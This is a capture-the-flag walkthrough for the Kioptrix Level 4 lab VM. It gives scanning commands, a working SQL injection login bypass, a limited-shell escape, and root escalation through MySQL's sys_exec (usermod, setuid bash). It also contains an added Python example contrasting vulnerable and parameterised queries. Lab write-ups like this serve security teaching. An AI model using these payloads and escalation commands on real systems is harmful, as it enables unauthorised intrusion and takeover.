Vulnhub Kioptrix Level 4 Complete Walkthrough
Levels 1, 2 and 3 are solved in the posts linked below:
Let’s solve level 4!!!
First, I run a port scan against the target machine to check the open ports and services.
Command: nmap -T4 -p- -A -oN nmap/initials 192.168.230.138
From the initial scan, you can see that ports 22, 80, 139 and 445 are open.
On Port 22 > SSH Service is up and running with version OpenSSH 4.7p1
On Port 80 > HTTP Service is up and running with version Apache httpd 2.2.8.
On Ports 139 and 445 > NetBIOS/SMB is open, which means I can enumerate SMB for any publicly accessible shares as well as usernames.
To enumerate usernames through NetBIOS with nmap, I ran the following command:
Command: nmap -T4 -p- -A --script=smb-enum-users 192.168.230.138
As you can see, I got 5 usernames (john, loneferret, nobody, robert, root). Next I scan with Nikto, one of the most popular open source web vulnerability scanners.
Command: nikto -host 192.168.230.138
Let's move on and try to access the IP address in the browser, i.e. http://192.168.230.138/, because port 80 is open. And!!! I found a login page, so let's go ahead and test for SQL injection by typing a single quote (') in both the username and password fields.
The error response confirmed that the SQL injection vulnerability is there, so I tried some combinations like these:
U > admin, P > admin (Not Accepted)
U > john, P > john (Not Accepted)
U > 'or''=', P > 'or''=' (Not Accepted)
U > ' OR 1=1--, P > ' OR 1=1-- (Not Accepted)
U > john, P > 1' or '1'='1 (Accepted)
So here I successfully logged in with username (john) and password (1' or '1'='1). It also seems like we got John's real password.
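To show why the password value above is accepted, here is an added example (not code from the Kioptrix VM or this walkthrough) that rebuilds the login check two ways in Python with an in-memory SQLite table standing in for the web app's MySQL users table: the string-concatenated query the bypass relies on, and a parameterised query that treats the same input as plain data. The table contents are constructed sample values, not the VM's real credentials.

```python
import sqlite3

# Constructed sample rows (not taken from the VM; the passwords are placeholders).
SAMPLE_USERS = [("john", "not-the-real-password"), ("robert", "another-sample")]


def make_db():
    """In-memory SQLite stand-in for the web application's MySQL users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return db


def login_vulnerable(db, username, password):
    """Builds the query by string concatenation, so quotes in the input become SQL.
    Returns the first matched username, or None when no row matches."""
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Binds both values as parameters: the input is data and is never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Runs the accepted password value from the walkthrough against both versions."""
    db = make_db()
    payload = "1' or '1'='1"
    return {
        # Concatenated query becomes ... AND password='1' or '1'='1', which is always true.
        "vulnerable": login_vulnerable(db, "john", payload),
        # Parameterised query compares the literal string, so no row matches.
        "fixed": login_fixed(db, "john", payload),
        # The fixed version still accepts the genuine credential.
        "fixed_real": login_fixed(db, "john", "not-the-real-password"),
    }


if __name__ == "__main__":
    print(demo())
```

The same fix applies to the PHP/MySQL original: bind the username and password with prepared statements instead of interpolating them into the query string.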
Let's try to SSH in with username john and password (MyNameIsJohn) by typing the following command in the terminal.
Command: ssh john@192.168.230.138
After logging in, john lands in a limited shell, which can easily be bypassed with the help of the echo or vim command. To bypass this limited shell, I used the following
Command: echo os.system('/bin/bash')
Okay! Now that I have more access, as you can see, I am able to execute the pwd command, which prints the present working directory. Furthermore, I grep for processes run by the root user and for the running mysql service by typing the following command:
Command: ps -ef | grep root | grep mysql
Let's see if I can find the DB username and DB password in the config file located in the /var/www directory.
As you can see, there is no password in the config, so you can easily bypass MySQL with a UDF. This means you can escalate privileges to root, but first you need to confirm that the mysql service is running with root privileges (the ps output above shows it is) and that the sys UDF library is present, with the following command:
Command: ls -la /usr/lib/lib_mysqludf_sys.so
Yes, the mysql service is running with root privileges and the UDF library is there, so now I can directly access the database with the mysql client.
Command: mysql -h localhost -u root -p
"show databases;" will give you a list of all databases hosted on the target, and you can also run a usermod command through sys_exec to give john admin privileges.
Using sys_exec we were able to run usermod, which added john to the admin group.
And then I ran sudo su to get the root shell.
You can also use select sys_exec('chmod u+s /bin/bash'); for privilege escalation, which gives a bash shell with full permissions.
AND it’s ROOT!!!, That’s all for this machine,
Until Next Time,